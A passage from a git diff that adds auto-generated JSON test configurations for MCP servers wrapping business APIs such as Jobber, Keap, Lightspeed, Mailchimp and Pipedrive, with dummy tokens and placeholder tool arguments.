"test-id-123", + "address_id": "test-id-123", + "description": "test_value", + "scheduled_start": "test_value", + "scheduled_end": "", + "assigned_employee_ids": [], + "tags": [] + }, + "expect": "exists" + }, + "list_estimates": { + "args": { + "page": 50, + "per_page": 50, + "status": "pending", + "customer_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_estimates:empty-status": { + "args": { + "page": 50, + "per_page": 50, + "status": "", + "customer_id": "test-id-123" + }, + "expect": "exists" + }, + "list_estimates:empty-customer_id": { + "args": { + "page": 50, + "per_page": 50, + "status": "pending", + "customer_id": "" + }, + "expect": "exists" + }, + "create_estimate": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "message": "test_value", + "options": [] + }, + "expect": "content && content.length > 0" + }, + "create_estimate:empty-address_id": { + "args": { + "customer_id": "test-id-123", + "address_id": "", + "message": "test_value", + "options": [] + }, + "expect": "exists" + }, + "create_estimate:empty-message": { + "args": { + "customer_id": "test-id-123", + "address_id": "test-id-123", + "message": "", + "options": [] + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "page": 50, + "per_page": 50, + "q": "test_value", + "sort": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-q": { + "args": { + "page": 50, + "per_page": 50, + "q": "", + "sort": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-sort": { + "args": { + "page": 50, + "per_page": 50, + "q": "test_value", + "sort": "" + }, + "expect": "exists" + }, + "list_invoices": { + "args": { + "page": 50, + "per_page": 50, + "status": "draft", + "customer_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-status": { + "args": { + "page": 50, + "per_page": 50, + "status": "", + "customer_id": "test-id-123" + }, + "expect": "exists" + }, + "list_invoices:empty-customer_id": { + "args": { + "page": 50, + "per_page": 50, + "status": "draft", + "customer_id": "" + }, + "expect": "exists" + }, + "list_employees": { + "args": { + "page": 50, + "per_page": 50, + "active": true + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/housecall-pro.json b/factory-tools/test-configs/housecall-pro.json new file mode 100644 index 0000000..89fd291 --- /dev/null +++ b/factory-tools/test-configs/housecall-pro.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/housecall-pro/dist/index.js" + ], + "env": { + "HOUSECALL_PRO_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/jobber-tests.json b/factory-tools/test-configs/jobber-tests.json new file mode 100644 index 0000000..b524b6f --- /dev/null +++ b/factory-tools/test-configs/jobber-tests.json @@ -0,0 +1,272 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/jobber/dist/index.js" + ], + "env": { + "JOBBER_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_jobs": { + "args": { + "first": 50, + "after": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_jobs:empty-after": { + "args": { + "first": 50, + "after": "" + }, + "expect": "exists" + }, + "get_job": { + "args": { + "id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_job": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "instructions": "test_value", + "startAt": "test_value", + "endAt": "test_value", + "lineItems": [] + }, + "expect": "content && content.length > 0" + }, + "create_job:empty-instructions": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "instructions": "", + "startAt": "test_value", + "endAt": "test_value", + "lineItems": [] + }, + "expect": "exists" + }, + "create_job:empty-startAt": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "instructions": "test_value", + "startAt": "", + "endAt": "test_value", + "lineItems": [] + }, + "expect": "exists" + }, + "create_job:empty-endAt": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "instructions": "test_value", + "startAt": "test_value", + "endAt": "", + "lineItems": [] + }, + "expect": "exists" + }, + "list_quotes": { + "args": { + "first": 50, + "after": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_quotes:empty-after": { + "args": { + "first": 50, + "after": "" + }, + "expect": "exists" + }, + "create_quote": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "message": "test_value", + "lineItems": [] + }, + "expect": "content && content.length > 0" + }, + "create_quote:empty-message": { + "args": { + "clientId": "test-id-123", + "title": "test_value", + "message": "", + "lineItems": [] + }, + "expect": "exists" + }, + "list_invoices": { + "args": { + "first": 50, + "after": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-after": { + "args": { + "first": 50, + "after": "" + }, + "expect": "exists" + }, + "list_clients": { + "args": { + "first": 50, + "after": "test_value", + "searchTerm": "test query" + }, + "expect": "content && content.length > 0" + }, + "list_clients:empty-after": { + "args": { + "first": 50, + "after": "", + "searchTerm": "test query" + }, + "expect": "exists" + }, + "list_clients:empty-searchTerm": { + "args": { + "first": 50, + "after": "test_value", + "searchTerm": "" + }, + "expect": "exists" + }, + "create_client": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "content && content.length > 0" + }, + "create_client:empty-companyName": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-email": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-phone": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-street1": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "", + "city": "test_value", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-city": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "", + "province": "test_value", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-province": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "", + "postalCode": "javascript" + }, + "expect": "exists" + }, + "create_client:empty-postalCode": { + "args": { + "firstName": "Test Name", + "lastName": "Test Name", + "companyName": "Test Name", + "isCompany": true, + "email": "test@example.com", + "phone": "test_value", + "street1": "test_value", + "city": "test_value", + "province": "test_value", + "postalCode": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/jobber.json b/factory-tools/test-configs/jobber.json new file mode 100644 index 0000000..3caab9b --- /dev/null +++ b/factory-tools/test-configs/jobber.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/jobber/dist/index.js" + ], + "env": { + "JOBBER_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/keap-tests.json b/factory-tools/test-configs/keap-tests.json new file mode 100644 index 0000000..0ece40e --- /dev/null +++ b/factory-tools/test-configs/keap-tests.json @@ -0,0 +1,444 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/keap/dist/index.js" + ], + "env": { + "KEAP_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_contacts": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_contacts:empty-email": { + "args": { + "limit": 50, + "offset": 50, + "email": "", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-given_name": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-family_name": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-order": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-order_direction": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "", + "since": "test_value", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-since": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "", + "until": "test_value" + }, + "expect": "exists" + }, + "list_contacts:empty-until": { + "args": { + "limit": 50, + "offset": 50, + "email": "test@example.com", + "given_name": "Test Name", + "family_name": "Test Name", + "order": "test_value", + "order_direction": "ASCENDING", + "since": "test_value", + "until": "" + }, + "expect": "exists" + }, + "get_contact": { + "args": { + "id": 50, + "optional_properties": [] + }, + "expect": "content && content.length > 0" + }, + "create_contact": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "content && content.length > 0" + }, + "create_contact:empty-given_name": { + "args": { + "email_addresses": [], + "given_name": "", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "exists" + }, + "create_contact:empty-family_name": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "exists" + }, + "create_contact:empty-job_title": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "exists" + }, + "create_contact:empty-opt_in_reason": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "", + "source_type": "WEBFORM", + "custom_fields": [] + }, + "expect": "exists" + }, + "create_contact:empty-source_type": { + "args": { + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "lead_source_id": 50, + "opt_in_reason": "test_value", + "source_type": "", + "custom_fields": [] + }, + "expect": "exists" + }, + "update_contact": { + "args": { + "id": 50, + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "custom_fields": [] + }, + "expect": "content && content.length > 0" + }, + "update_contact:empty-given_name": { + "args": { + "id": 50, + "email_addresses": [], + "given_name": "", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "custom_fields": [] + }, + "expect": "exists" + }, + "update_contact:empty-family_name": { + "args": { + "id": 50, + "email_addresses": [], + "given_name": "Test Name", + "family_name": "", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "test_value", + "custom_fields": [] + }, + "expect": "exists" + }, + "update_contact:empty-job_title": { + "args": { + "id": 50, + "email_addresses": [], + "given_name": "Test Name", + "family_name": "Test Name", + "phone_numbers": [], + "addresses": [], + "company": {}, + "job_title": "", + "custom_fields": [] + }, + "expect": "exists" + }, + "list_opportunities": { + "args": { + "limit": 50, + "offset": 50, + "user_id": 50, + "stage_id": 50, + "search_term": "test query", + "order": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_opportunities:empty-search_term": { + "args": { + "limit": 50, + "offset": 50, + "user_id": 50, + "stage_id": 50, + "search_term": "", + "order": "test_value" + }, + "expect": "exists" + }, + "list_opportunities:empty-order": { + "args": { + "limit": 50, + "offset": 50, + "user_id": 50, + "stage_id": 50, + "search_term": "test query", + "order": "" + }, + "expect": "exists" + }, + "list_tasks": { + "args": { + "limit": 50, + "offset": 50, + "contact_id": 50, + "user_id": 50, + "completed": true, + "since": "test_value", + "until": "test_value", + "order": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_tasks:empty-since": { + "args": { + "limit": 50, + "offset": 50, + "contact_id": 50, + "user_id": 50, + "completed": true, + "since": "", + "until": "test_value", + "order": "test_value" + }, + "expect": "exists" + }, + "list_tasks:empty-until": { + "args": { + "limit": 50, + "offset": 50, + "contact_id": 50, + "user_id": 50, + "completed": true, + "since": "test_value", + "until": "", + "order": "test_value" + }, + "expect": "exists" + }, + "list_tasks:empty-order": { + "args": { + "limit": 50, + "offset": 50, + "contact_id": 50, + "user_id": 50, + "completed": true, + "since": "test_value", + "until": "test_value", + "order": "" + }, + "expect": "exists" + }, + "create_task": { + "args": { + "title": "test_value", + "description": "test_value", + "contact": {}, + "due_date": "test_value", + "priority": 50, + "type": "test_value", + "user_id": 50, + "remind_time": 50 + }, + "expect": "content && content.length > 0" + }, + "create_task:empty-description": { + "args": { + "title": "test_value", + "description": "", + "contact": {}, + "due_date": "test_value", + "priority": 50, + "type": "test_value", + "user_id": 50, + "remind_time": 50 + }, + "expect": "exists" + }, + "create_task:empty-due_date": { + "args": { + "title": "test_value", + "description": "test_value", + "contact": {}, + "due_date": "", + "priority": 50, + "type": "test_value", + "user_id": 50, + "remind_time": 50 + }, + "expect": "exists" + }, + "create_task:empty-type": { + "args": { + "title": "test_value", + "description": "test_value", + "contact": {}, + "due_date": "test_value", + "priority": 50, + "type": "", + "user_id": 50, + "remind_time": 50 + }, + "expect": "exists" + }, + "list_tags": { + "args": { + "limit": 50, + "offset": 50, + "category": 50, + "name": "Test Name" + }, + "expect": "content && content.length > 0" + }, + "list_tags:empty-name": { + "args": { + "limit": 50, + "offset": 50, + "category": 50, + "name": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/keap.json b/factory-tools/test-configs/keap.json new file mode 100644 index 0000000..0855996 --- /dev/null +++ b/factory-tools/test-configs/keap.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/keap/dist/index.js" + ], + "env": { + "KEAP_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/lightspeed-tests.json b/factory-tools/test-configs/lightspeed-tests.json new file mode 100644 index 0000000..556de45 --- /dev/null +++ b/factory-tools/test-configs/lightspeed-tests.json @@ -0,0 +1,377 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/lightspeed/dist/index.js" + ], + "env": { + "LIGHTSPEED_ACCESS_TOKEN": "factory_discovery_dummy", + "LIGHTSPEED_ACCOUNT_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_sales": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "test_value", + "employeeID": "test-id-123", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_sales:empty-timeStamp": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "", + "employeeID": "test-id-123", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_sales:empty-employeeID": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "test_value", + "employeeID": "", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_sales:empty-shopID": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "test_value", + "employeeID": "test-id-123", + "shopID": "", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_sales:empty-load_relations": { + "args": { + "limit": 50, + "offset": 50, + "completed": true, + "timeStamp": "test_value", + "employeeID": "test-id-123", + "shopID": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + }, + "get_sale": { + "args": { + "sale_id": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_sale:empty-load_relations": { + "args": { + "sale_id": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + }, + "list_items": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_items:empty-categoryID": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-manufacturerID": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "", + "description": "test_value", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-description": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-upc": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "", + "customSku": "test_value", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-customSku": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "test_value", + "customSku": "", + "archived": true, + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_items:empty-load_relations": { + "args": { + "limit": 50, + "offset": 50, + "categoryID": "test-id-123", + "manufacturerID": "test-id-123", + "description": "test_value", + "upc": "test_value", + "customSku": "test_value", + "archived": true, + "load_relations": "" + }, + "expect": "exists" + }, + "get_item": { + "args": { + "item_id": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_item:empty-load_relations": { + "args": { + "item_id": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + }, + "update_inventory": { + "args": { + "item_shop_id": "test-id-123", + "qoh": 50, + "reorderPoint": 50, + "reorderLevel": 50 + }, + "expect": "content && content.length > 0" + }, + "list_customers": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-firstName": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-lastName": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-email": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-phone": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "", + "customerTypeID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-customerTypeID": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_customers:empty-load_relations": { + "args": { + "limit": 50, + "offset": 50, + "firstName": "Test Name", + "lastName": "Test Name", + "email": "test@example.com", + "phone": "test_value", + "customerTypeID": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + }, + "list_categories": { + "args": { + "limit": 50, + "offset": 50, + "parentID": "test-id-123", + "name": "Test Name", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_categories:empty-parentID": { + "args": { + "limit": 50, + "offset": 50, + "parentID": "", + "name": "Test Name", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_categories:empty-name": { + "args": { + "limit": 50, + "offset": 50, + "parentID": "test-id-123", + "name": "", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "list_categories:empty-load_relations": { + "args": { + "limit": 50, + "offset": 50, + "parentID": "test-id-123", + "name": "Test Name", + "load_relations": "" + }, + "expect": "exists" + }, + "get_register": { + "args": { + "register_id": "test-id-123", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_register:empty-register_id": { + "args": { + "register_id": "", + "shopID": "test-id-123", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "get_register:empty-shopID": { + "args": { + "register_id": "test-id-123", + "shopID": "", + "load_relations": "test_value" + }, + "expect": "exists" + }, + "get_register:empty-load_relations": { + "args": { + "register_id": "test-id-123", + "shopID": "test-id-123", + "load_relations": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/lightspeed.json b/factory-tools/test-configs/lightspeed.json new file mode 100644 index 0000000..4fb058b --- /dev/null +++ b/factory-tools/test-configs/lightspeed.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/lightspeed/dist/index.js" + ], + "env": { + "LIGHTSPEED_ACCESS_TOKEN": "factory_discovery_dummy", + "LIGHTSPEED_ACCOUNT_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/mailchimp-tests.json b/factory-tools/test-configs/mailchimp-tests.json new file mode 100644 index 0000000..cb7a57d --- /dev/null +++ b/factory-tools/test-configs/mailchimp-tests.json @@ -0,0 +1,156 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/mailchimp/dist/index.js" + ], + "env": { + "MAILCHIMP_API_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_campaigns": { + "args": { + "count": 50, + "offset": 50, + "status": "save", + "type": "regular" + }, + "expect": "content && content.length > 0" + }, + "list_campaigns:empty-status": { + "args": { + "count": 50, + "offset": 50, + "status": "", + "type": "regular" + }, + "expect": "exists" + }, + "list_campaigns:empty-type": { + "args": { + "count": 50, + "offset": 50, + "status": "save", + "type": "" + }, + "expect": "exists" + }, + "get_campaign": { + "args": { + "campaign_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_campaign": { + "args": { + "type": "regular", + "list_id": "test-id-123", + "subject_line": "test_value", + "preview_text": "Sample content for testing", + "title": "test_value", + "from_name": "Test Name", + "reply_to": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_campaign:empty-preview_text": { + "args": { + "type": "regular", + "list_id": "test-id-123", + "subject_line": "test_value", + "preview_text": "", + "title": "test_value", + "from_name": "Test Name", + "reply_to": "test_value" + }, + "expect": "exists" + }, + "create_campaign:empty-title": { + "args": { + "type": "regular", + "list_id": "test-id-123", + "subject_line": "test_value", + "preview_text": "Sample content for testing", + "title": "", + "from_name": "Test Name", + "reply_to": "test_value" + }, + "expect": "exists" + }, + "send_campaign": { + "args": { + "campaign_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_lists": { + "args": { + "count": 50, + "offset": 50 + }, + "expect": "content && content.length > 0" + }, + "add_subscriber": { + "args": { + "list_id": "test-id-123", + "email": "test@example.com", + "status": "subscribed", + "first_name": "Test Name", + "last_name": "Test Name", + "tags": [] + }, + "expect": "content && content.length > 0" + }, + "add_subscriber:empty-first_name": { + "args": { + "list_id": "test-id-123", + "email": "test@example.com", + "status": "subscribed", + "first_name": "", + "last_name": "Test Name", + "tags": [] + }, + "expect": "exists" + }, + "add_subscriber:empty-last_name": { + "args": { + "list_id": "test-id-123", + "email": "test@example.com", + "status": "subscribed", + "first_name": "Test Name", + "last_name": "", + "tags": [] + }, + "expect": "exists" + }, + "get_subscriber": { + "args": { + "list_id": "test-id-123", + "email": "test@example.com" + }, + "expect": "content && content.length > 0" + }, + "list_templates": { + "args": { + "count": 50, + "offset": 50, + "type": "user" + }, + "expect": "content && content.length > 0" + }, + "list_templates:empty-type": { + "args": { + "count": 50, + "offset": 50, + "type": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/mailchimp.json b/factory-tools/test-configs/mailchimp.json new file mode 100644 index 0000000..3aae0e8 --- /dev/null +++ b/factory-tools/test-configs/mailchimp.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/mailchimp/dist/index.js" + ], + "env": { + "MAILCHIMP_API_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/pipedrive-tests.json b/factory-tools/test-configs/pipedrive-tests.json new file mode 100644 index 0000000..0882579 --- /dev/null +++ b/factory-tools/test-configs/pipedrive-tests.json @@ -0,0 +1,470 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/pipedrive/dist/index.js" + ], + "env": { + "PIPEDRIVE_API_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_deals": { + "args": { + "status": "open", + "start": 50, + "limit": 50, + "sort": "test_value", + "user_id": 50, + "stage_id": 50, + "pipeline_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_deals:empty-status": { + "args": { + "status": "", + "start": 50, + "limit": 50, + "sort": "test_value", + "user_id": 50, + "stage_id": 50, + "pipeline_id": 50 + }, + "expect": "exists" + }, + "list_deals:empty-sort": { + "args": { + "status": "open", + "start": 50, + "limit": 50, + "sort": "", + "user_id": 50, + "stage_id": 50, + "pipeline_id": 50 + }, + "expect": "exists" + }, + "get_deal": { + "args": { + "id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_deal": { + "args": { + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "pipeline_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "visible_to": 50 + }, + "expect": "content && content.length > 0" + }, + "create_deal:empty-currency": { + "args": { + "title": "test_value", + "value": 50, + "currency": "", + "person_id": 50, + "org_id": 50, + "pipeline_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "visible_to": 50 + }, + "expect": "exists" + }, + "create_deal:empty-status": { + "args": { + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "pipeline_id": 50, + "stage_id": 50, + "status": "", + "expected_close_date": "test_value", + "probability": 50, + "visible_to": 50 + }, + "expect": "exists" + }, + "create_deal:empty-expected_close_date": { + "args": { + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "pipeline_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "", + "probability": 50, + "visible_to": 50 + }, + "expect": "exists" + }, + "update_deal": { + "args": { + "id": 50, + "title": "test_value", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "content && content.length > 0" + }, + "update_deal:empty-title": { + "args": { + "id": 50, + "title": "", + "value": 50, + "currency": "test_value", + "person_id": 50, + "org_id": 50, + "stage_id": 50, + "status": "open", + "expected_close_date": "test_value", + "probability": 50, + "lost_reason": "test_value", + "won_time": "test_value", + "lost_time": "test_value" + }, + "expect": "exists" + }, + 